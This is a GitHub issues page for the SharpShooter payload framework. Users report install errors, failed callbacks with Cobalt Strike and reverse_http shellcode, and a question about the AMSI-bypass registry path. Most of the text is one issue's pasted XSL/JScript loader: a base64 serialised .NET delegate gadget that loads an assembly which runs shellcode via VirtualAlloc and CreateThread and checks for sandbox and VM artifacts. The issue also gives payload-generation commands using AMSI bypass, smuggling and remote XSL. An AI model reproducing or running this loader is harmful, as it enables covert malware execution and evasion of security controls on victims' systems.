
sharpshooter's People

Contributors

byt3bl33d3r, dmchell, dumb-questions, mdsec

sharpshooter's Issues

installing error

When I installed it, it said ImportError: No module named jsmin.

How can I fix this?

Does not appear to work with reverse_http

Hi there,
In the blog posts it is shown that the reverse_http C# shellcode is used. However, after a couple of hours of trying to use the tool for the first time, thinking I was doing something wrong, I decided to switch to reverse_tcp and it worked on the first try.
Using the newest version of Kali and Windows 7 SP1 with .NET 2-4 (FireEye FLARE packages installed).

Issue executing C# CobaltStrike Payload

Hi, I came across this yesterday and thought it was a really cool project, so today I'm having a little play!
I have generated a C# payload from Cobalt Strike, put it in the format "0x41, 0x42" etc., and then referenced that in my command:

python SharpShooter.py --dotnetver 2 --stageless --payload hta --rawscfile ~/payload.cs --smuggle --output payload --template mcafee

I host the HTML and HTA on the web server using "host file" in Cobalt Strike. When I go and visit the page the HTA downloads and I can execute it, but I don't get a callback.

I've had a skim of the source code but it's not immediately obvious to me why this wouldn't work. I have .NET installed on the machine I'm testing on as well.

I suppose I'm asking: does this definitely work with Cobalt Strike C# payloads?

Thanks again for the project and look forward to your response.
Cheers

EDIT 14:33:
I have been testing again: I put the same shellcode into the CS file, compiled and executed it, and it worked fine. It's not an EDR product blocking either, so I am still unsure. It just doesn't seem to work when using the generated HTA file.

Error installing

When I start SharpShooter after installing requirements.txt I do python SharpShooter.py, but it doesn't start. I also tried to do chmod +x or 777 on SharpShooter.py, but it always gives me this error:
Traceback (most latest call last):
File "SharpShooter.py", line 20, in
from jsmin import jsmin
ImportError: no module called jsmin

Is this project still under development?

I've done a recent git clone and it appears to not be accepting anything other than the staged HTA payload, and even still it does not appear to connect back to the attacking machine. The demo one-liners result in a looping error in its selection.

Am I missing something, or is the tool just not ready to be used?

jsmin help

I successfully installed jsmin; running python SharpShooter.py is not locating jsmin even though it exists on the system. Kindly advise.

Correct Reg path for AMSI commit?

I was looking at your recent commit adding the AMSI bypass for VB and JS methods, and looked for the reg path HKCU\Software\Microsoft\Windows Script\Settings\ on my 1803 Windows machine, and couldn't find it. There is a HKCU\Software\Microsoft\Windows Script Host\Settings\ key however.

Just wanted to make sure that the path wasn't in error.
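The reporter's observation is the useful part for defenders: on a clean Windows install only the Windows Script Host\Settings key exists, so the Windows Script\Settings key that the AmsiEnable bypass writes is a tamper indicator when it does appear. The following PowerShell is an added defender-side audit, not SharpShooter code and not from the issue; it walks every loaded user hive under HKEY_USERS and reports whether that key is present and whether AmsiEnable is 0. The key and value names are taken from this page; the HKU drive name is an assumption of the example.

```powershell
# Added audit (not SharpShooter code). Assumption: on a default Windows install
#   HKCU\Software\Microsoft\Windows Script\Settings
# is absent (only ...\Windows Script Host\Settings exists, as the issue notes),
# so its presence with AmsiEnable = 0 in any loaded user hive merits a look.

# Expose HKEY_USERS so every loaded profile hive is checked, not only the current user.
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}

$findings = foreach ($hive in Get-ChildItem -Path 'HKU:\' -ErrorAction SilentlyContinue) {
    $sid = $hive.PSChildName
    $key = "HKU:\$sid\Software\Microsoft\Windows Script\Settings"
    if (Test-Path -Path $key) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        [pscustomobject]@{
            UserSid    = $sid
            KeyPresent = $true
            AmsiEnable = $props.AmsiEnable          # $null when the value is absent
            Suspicious = ($props.AmsiEnable -eq 0)  # 0 turns AMSI off for wscript/cscript
        }
    }
}

if (-not $findings) {
    Write-Output "No 'Windows Script\Settings' key in any loaded user hive (expected on a clean host)."
} else {
    $findings | Format-Table -AutoSize
}
```

Run it from an elevated prompt so that hives of other logged-on users are visible; a row with Suspicious = True is the condition to investigate, while a row with KeyPresent = True and AmsiEnable empty still shows that something created a key that is not there by default.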

.Net v4 compatibility issue from VBA/macro

Hi,

I'm getting a similar problem to mdsecactivebreach/CACTUSTORCH#4. Basically I am generating a payload using the following arguments:

python SharpShooter.py --stageless --dotnetver 4 --payload macro --output foo --amsi amsienable --rawscfile payload.bin --com xslremote --awlurl http://172.16.132.1:80/foo.xsl

The macro is then being run on a Win 10 host with only .NET Framework v4 installed (no .NET v2). However, with both my own assembly and the built-in SharpShooter assembly, the code executes but I get no callbacks. After putting in some debug shell.popups, it looks like it's failing when it gets to some of the System calls. Is there some sort of issue with running the JScript from XSL on systems with only .NET v4 installed? The JScript runs fine on the same system when executed from a SCT file etc.

Code below:

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:sharp="http://sharp.shooter/mynamespace">
 
<msxsl:script language="JScript" implements-prefix="sharp">
   function shooter(nodelist) {
<![CDATA[
function setversion() {
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
}
function debug(s) {}
function base64ToStream(b) {
	var enc = new ActiveXObject("System.Text.ASCIIEncoding");
	var length = enc.GetByteCount_2(b);
	var ba = enc.GetBytes_4(b);
	var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
	ba = transform.TransformFinalBlock(ba, 0, length);
	var ms = new ActiveXObject("System.IO.MemoryStream");
	ms.Write(ba, 0, (length / 4) * 3);
	ms.Position = 0;
	return ms;
}

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAACoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAC2SEWgAAAAAA"+
"AAAA4AAiIAsBMAAAIAAAAAgAAAAAAACKPwAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAOD8A"+
"AE8AAAAAQAAAVAQAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAA+AAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAACQHwAAACAAAAAgAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAVAQAAABA"+
"AAAABgAAACIAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAoAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAGw/AAAAAAAASAAAAAIABQDMIwAANBoAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXgMoEAAACm8R"+
"AAAKFygSAAAKLAIXKhYqbnIBAABwKBAAAApvEQAAChcoEgAACiwCFioXKhMwBABSAQAAAQAAEXMT"+
"AAAKCh8gjRoAAAElFnIDAABwoiUXclUAAHCiJRhypQAAcKIlGXLzAABwoiUackUBAHCiJRtylQEA"+
"cKIlHHLhAQBwoiUdcjkCAHCiJR5yjQIAcKIlHwly3QIAcKIlHwpyNwMAcKIlHwtyhwMAcKIlHwxy"+
"3wMAcKIlHw1yNwQAcKIlHw5ylwQAcKIlHw9y5wQAcKIlHxByPQUAcKIlHxFykwUAcKIlHxJy4wUA"+
"cKIlHxNyOQYAcKIlHxRyfQYAcKIlHxVywQYAcKIlHxZyBwcAcKIlHxdySQcAcKIlHxhymwcAcKIl"+
"Hxly6QcAcKIlHxpyOwgAcKIlHxtykwgAcKIlHxxy4wgAcKIlHx1yQQkAcKIlHx5yiwkAcKIlHx9y"+
"zwkAcKILFgwrFwcImg0JKBQAAAosBwYJbxUAAAoIF1gMCAeOaTLjBm8WAAAKLQIWKhcqAAATMAYA"+
"xwAAAAIAABFzEwAACgobjRoAAAElFnIZCgBwoiUXcicKAHCiJRhyNQoAcKIlGXJDCgBwoiUaclEK"+
"AHCiCygXAAAKDBYNK3YICZoTBAcTBRYTBitdEQURBpoTBxEEbxgAAApvGQAACm8aAAAKEQdvGgAA"+
"Cm8bAAAKLDEGEQRvGAAACm8ZAAAKcl8KAHByaQoAcCgcAAAKF40fAAABJRYfOp1vHQAACm8VAAAK"+
"EQYXWBMGEQYRBY5pMpsJF1gNCQiOaTKEBm8WAAAKLQIWKhcqLigeAAAKLAIXKhYqHgIoHwAACioA"+
"EzACAG0AAAADAAARcwYAAAYKA0UFAAAAAQAAABEAAAAgAAAALwAAAD4AAAAqBgRvAQAABi1CFygg"+
"AAAKKgZvAgAABi0zFyggAAAKKgZvAwAABiwkFyggAAAKKgZvBAAABiwVFyggAAAKKgZvBQAABiwG"+
"FyggAAAKKjJzCgAABgNvDQAABioAABswBABbAAAABAAAEQMoIQAACgp+IgAACgaOaRdYaigjAAAK"+
"IAAwAAAfQCgHAAAGCwYWBwaOaSgkAAAKB9AHAAACKCUAAAooJgAACnQHAAACbw8AAAYm3g4HFiAA"+
"gAAAKAkAAAYm3CoAARAAAAIAJAAoTAAOAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAA"+
"AAUAbAAAAPAFAAAjfgAAXAYAAOwGAAAjU3RyaW5ncwAAAABIDQAAdAoAACNVUwC8FwAAEAAAACNH"+
"VUlEAAAAzBcAAGgCAAAjQmxvYgAAAAAAAAACAAABVx0CHAkCAAAA+gEzABYAAAEAAAAoAAAABwAA"+
"ABcAAAARAAAAFwAAACYAAAAUAAAAEQAAAAQAAAACAAAAAQAAAAMAAAABAAAAAgAAAAQAAAAAAEEE"+
"AQAAAAAABgARA4cFBgB+A4cFBgAtAj0FDwCnBQAABgBVApQEBgDDApQEBgCkApQEBgBlA5QEBgAx"+
"A5QEBgBKA5QEBgBsApQEBgBBAmgFBgAfAmgFBgCHApQEBgBqBloEBgABAOYACgBiAXYEBgACA1oE"+
"BgBhBFoEBgC3BGgFBgDgAmgFBgANAloEBgCTBloEBgAPBFoECgC5BXYEBgAEBFoEBgDJBFoEBgDB"+
"AX8ACgAhBnYECgDLBv8FBgDiBFoEBgDnBD0FBgCnBloEBgDDBloEBgA2BVoEBgA1BVoEBgAsBGgF"+
"BgDsAVoEBgCdAVoEBgAWAloEAAAAAB0AAAAAAAEAAQAAABAA8QEAAD0AAQABAAEAEAAaBQAAPQAB"+
"AAcAAgEAAOIBAABNAAEADgACAQAApgQAAE0ACQAOAAIBAADXAQAATQAVAA4AAgEAAP0BAABZABgA"+
"DgAGBswALgFWgKoAMQFWgFkAMQFWgJ4AMQFWgIkAMQFWgG0AMQFWgHYAMQFWgGEAMQEGBswALgFW"+
"gFEANQFWgCYANQFWgD8ANQFWgLoANQFWgJUANQFWgLEANQFWgEcANQFWgMIANQFWgK8DNQFWgMID"+
"NQFWgNcDNQEGBswALgFWgKQAOQFWgDMAOQFQIAAAAACGAGYEcQABAGggAAAAAIYARAE9AQIAhCAA"+
"AAAAhgBKBj0BAgDkIQAAAACGAN0APQECALciAAAAAIYAKgE9AQIAwyIAAAAAhhgvBQYAAgAAAAAA"+
"gACRIAEBQQECAAAAAACAAJYgGQFLAQYAAAAAAIAAkSB7AVUBDADDIgAAAACGGC8FBgAPAMwiAAAA"+
"AIYA8QFdAQ8ARSMAAAAAhgDaBBAAEQBUIwAAAACGAL0GEAASAAAAAAADAIYYLwVjARMAAAAAAAMA"+
"xgGWAU4AFQAAAAAAAwDGAZEBaQEVAAAAAAADAMYBhwFxARcAAAABAG8EAAABADEGAAACAKgDAAAD"+
"AOABAAAEAHgGAAABAMwFAAACAJwDAAADADsGAAAEAPAEAAAFAN8FAAAGAA4BAAABADEGAAACAKgD"+
"AAADANUBAAABACYEAAACAAsEAAABABEAAAABABEAAAABAHEGAAACAFsBAAABAB0EAAACAHEGAAAB"+
"AKAGCQAvBQEAEQAvBQYAGQAvBQoAKQAvBRAAMQAvBRAAOQAvBRAAQQAvBRAASQAvBRAAUQAvBRAA"+
"WQAvBRAAYQAvBRUAaQAvBRAAcQAvBRAAkQAvBQYAqQAvBRoAyQC2BSAAyQDGASUA0QDvBSkADAAv"+
"BQYA4QBjBkMADAAmAUgADACzBk4AiQBQBWYAiQAeBmwAeQACBCUA0QAnBSUA0QD2BXEA8QBzAXYA"+
"0QBTAX0AAQE1AYMAeQAvBQYACQGOBowAEQHxA5cAGQHdBJ0AIQGCBqAAKQHmBqUAMQGvAa4AKQH8"+
"BLcACQAIAMoACQAMAM8ACQAQANQACQAUANkACQAYAN4ACQAcAOMACQAgAOgACQAoAO0ACQAsAPIA"+
"CQAwAPcACQA0APwACQA4AAEBCQA8AAYBCQBAAAsBCQBEABABCQBIABUBCQBMABoBCQBQAB8BCQBY"+
"ACQBCQBcACkBLgALAHcBLgATAIABLgAbAJ8BLgAjAKgBLgArAMIBLgAzAOUBLgA7AOsBLgBDAKgB"+
"LgBLAAMCLgBTAOUBLgBbAOUBLgBjACsCLgBrAFUCYwBbAGICgwBzAAEBowBzAAEB4wB7AJ8BMQBS"+
"AIcAkQA0BAgAPQBAAQ8AAQEBAAABEQAZAQEAAAETAHsBAgAEgAAAAQAAAAAAAAAAAAAAAADRBgAA"+
"AgAAAAAAAAAAAAAAwQDUAAAAAAACAAAAAAAAAAAAAADBAFoEAAAAAAQAAwAFAAMABgADAAcAAwAA"+
"AAAAAExpc3RgMQBrZXJuZWwzMgBzaGVsbGNvZGU2NAA8TW9kdWxlPgBFWEVDVVRFX1JFQUQATUVN"+
"X1JFTEVBU0UARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAFdSSVRFX1dBVENIAFBI"+
"WVNJQ0FMAFRPUF9ET1dOAFN5c3RlbS5JTwBMQVJHRV9QQUdFUwBOT0FDQ0VTUwBSRVNFVABNRU1f"+
"REVDT01NSVQAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBpc0Jh"+
"ZE1hYwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBWaXJ0dWFsQWxsb2MAbHBUaHJlYWRJZABD"+
"cmVhdGVUaHJlYWQAQWRkAGlzRGVidWdnZWQAZ2V0X0lzQXR0YWNoZWQAaXNEb21haW5Kb2luZWQA"+
"VHJpbUVuZABtZXRob2QATmV0d29ya0ludGVyZmFjZQBSZXBsYWNlAFZpcnR1YWxGcmVlAEVuZElu"+
"dm9rZQBCZWdpbkludm9rZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxl"+
"AGdldF9Eb21haW5OYW1lAGR3RnJlZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBDaGVja1BsZWFzZQBF"+
"eGVjdXRlRGVsZWdhdGUATXVsdGljYXN0RGVsZWdhdGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxl"+
"QXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3Nl"+
"bWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2Vt"+
"Ymx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAFVu"+
"bWFuYWdlZEZ1bmN0aW9uUG9pbnRlckF0dHJpYnV0ZQBGbGFnc0F0dHJpYnV0ZQBDb21waWxhdGlv"+
"blJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNv"+
"cHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGli"+
"aWxpdHlBdHRyaWJ1dGUAZHdTdGFja1NpemUAZHdTaXplAEdVQVJEX01vZGlmaWVyZmxhZwBOT0NB"+
"Q0hFX01vZGlmaWVyZmxhZwBXUklURUNPTUJJTkVfTW9kaWZpZXJmbGFnAEZyb21CYXNlNjRTdHJp"+
"bmcAVG9TdHJpbmcAYXJnAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sAY2hlY2sATWFyc2hhbABrZXJu"+
"ZWwzMi5kbGwAU2hhcnBTaG9vdGVyQXNzZW1ibHkuZGxsAFN5c3RlbQBFbnVtAGlzRG9tYWluAGRv"+
"bWFpbgBTeXN0ZW0uTmV0Lk5ldHdvcmtJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNZW1v"+
"cnlQcm90ZWN0aW9uAENhbGxpbmdDb252ZW50aW9uAFN0cmluZ0NvbXBhcmlzb24AR28AWmVybwBD"+
"aGFyAERlYnVnZ2VyAGxwUGFyYW1ldGVyAEdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyAFNo"+
"YXJwU2hvb3RlcgBUb0xvd2VyAC5jdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAEdldEFs"+
"bE5ldHdvcmtJbnRlcmZhY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+
"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEdldElQR2xvYmFsUHJvcGVy"+
"dGllcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAEVxdWFscwBDb250YWlucwBT"+
"eXN0ZW0uVGV4dC5SZWd1bGFyRXhwcmVzc2lvbnMAR2V0UGh5c2ljYWxBZGRyZXNzAGxwQWRkcmVz"+
"cwBscFN0YXJ0QWRkcmVzcwBjb250YWluc1NhbmRib3hBcnRpZmFjdHMARXhpc3RzAE9iamVjdABv"+
"YmplY3QAZmxQcm90ZWN0AG9wX0V4cGxpY2l0AEV4aXQASUFzeW5jUmVzdWx0AHJlc3VsdABFbnZp"+
"cm9ubWVudABnZXRfQ291bnQAU2hvb3QAQ29udmVydABSZWdleABTaGFycFNob290ZXJBc3NlbWJs"+
"eQBDb3B5AAAAAQBRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARABy"+
"AGkAdgBlAHIAcwBcAFYAbQBtAG8AdQBzAGUALgBzAHkAcwAAT0MAOgBcAHcAaQBuAGQAbwB3AHMA"+
"XABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AMwBkAGcAbAAuAGQAbABs"+
"AABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIA"+
"cwBcAHYAbQBkAHUAbQAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0"+
"AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAHYAbQAzAGQAdgBlAHIALgBkAGwAbAAAT0MAOgBcAHcA"+
"aQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdABy"+
"AGEAeQAuAGQAbABsAABLQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwA"+
"RAByAGkAdgBlAHIAcwBcAHYAbQBjAGkALgBzAHkAcwAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdQBzAGIAbQBvAHUAcwBlAC4A"+
"cwB5AHMAAFNDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2"+
"AGUAcgBzAFwAdgBtAHgAXwBzAHYAZwBhAC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwA"+
"UwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHgAbgBlAHQALgBzAHkAcwAA"+
"WUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMA"+
"XABWAE0AVABvAG8AbABzAEgAbwBvAGsALgBkAGwAbAAAT0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AaABnAGYAcwAuAGQAbABsAABX"+
"QwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBc"+
"AHYAbQBtAG8AdQBzAGUAdgBlAHIALgBkAGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkA"+
"cwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0ARwB1AGUAcwB0AEwAaQBiAC4AZABs"+
"AGwAAF9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUA"+
"cgBzAFwAVgBtAEcAdQBlAHMAdABMAGkAYgBKAGEAdgBhAC4AZABsAGwAAE9DADoAXAB3AGkAbgBk"+
"AG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHMAYwBzAGkA"+
"LgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBp"+
"AHYAZQByAHMAXABWAEIAbwB4AE0AbwB1AHMAZQAuAHMAeQBzAABVQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAFYAQgBvAHgARwB1AGUAcwB0"+
"AC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIA"+
"aQB2AGUAcgBzAFwAVgBCAG8AeABTAEYALgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXABWAEIAbwB4AFYAaQBkAGUAbwAuAHMA"+
"eQBzAABDQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABk"+
"AGkAcwBwAC4AZABsAGwAAENDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUA"+
"XAB2AGIAbwB4AGgAbwBvAGsALgBkAGwAbAAARUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBu"+
"AGEAdABpAHYAZQBcAHYAYgBvAHgAbQByAHgAbgBwAC4AZABsAGwAAEFDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAC4AZABsAGwAAFFDADoAXAB3"+
"AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAGEAcgByAGEA"+
"eQBzAHAAdQAuAGQAbABsAABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBl"+
"AFwAdgBiAG8AeABvAGcAbABjAHIAdQB0AGkAbAAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABvAGcAbABlAHIAcgBvAHIAcwBwAHUALgBk"+
"AGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgA"+
"bwBnAGwAZgBlAGUAZABiAGEAYwBrAHMAcAB1AC4AZABsAGwAAE9DADoAXAB3AGkAbgBkAG8AdwBz"+
"AFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAHAAYQBjAGsAcwBwAHUALgBkAGwA"+
"bAAAXUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAbwBn"+
"AGwAcABhAHMAcwB0AGgAcgBvAHUAZwBoAHMAcAB1AC4AZABsAGwAAElDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AHMAZQByAHYAaQBjAGUALgBlAHgAZQAA"+
"Q0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAdAByAGEA"+
"eQAuAGUAeABlAABJQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAVgBC"+
"AG8AeABDAG8AbgB0AHIAbwBsAC4AZQB4AGUAAA0wADAAMABDADIAOQAADTAAMAAxAEMAMQA0AAAN"+
"MAAwADUAMAA1ADYAAA0wADAAMAA1ADYAOQAADTAAOAAwADAAMgA3AAAJLgB7ADIAfQAAByQAMAA6"+
"AAAAAADjPT+Kbg2uQYSXn8N3asUDAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEVEEAAAS"+
"ZQMgAA4HAAMCDg4RbQsHBBUSQQEOHQ4IDgUVEkEBDgQAAQIOBSABARMAAyAACBMHCBUSQQEOHQ4d"+
"EkUIEkUdDggOBQAAHRJFBCAAEnUEIAECDgYAAw4ODg4FIAEOHQMDAAACBAcBEggEAAEBCAUHAh0F"+
"GAUAAR0FDgIGGAQAARkLCAAEAR0FCBgICAABEoCZEYCdCQACEoChGBKAmQi3elxWGTTgiQQAEAAA"+
"BAAgAAAEAAAIAAQAAAAgBAAAQAAEAAAQAAQAACAABBAAAAAEIAAAAARAAAAABIAAAAAEAQAAAAQC"+
"AAAABAQAAAAECAAAAAQAAQAABAACAAAEAAQAAAQAQAAABACAAAACBgkDBhEQAwYRFAMGERgDIAAC"+
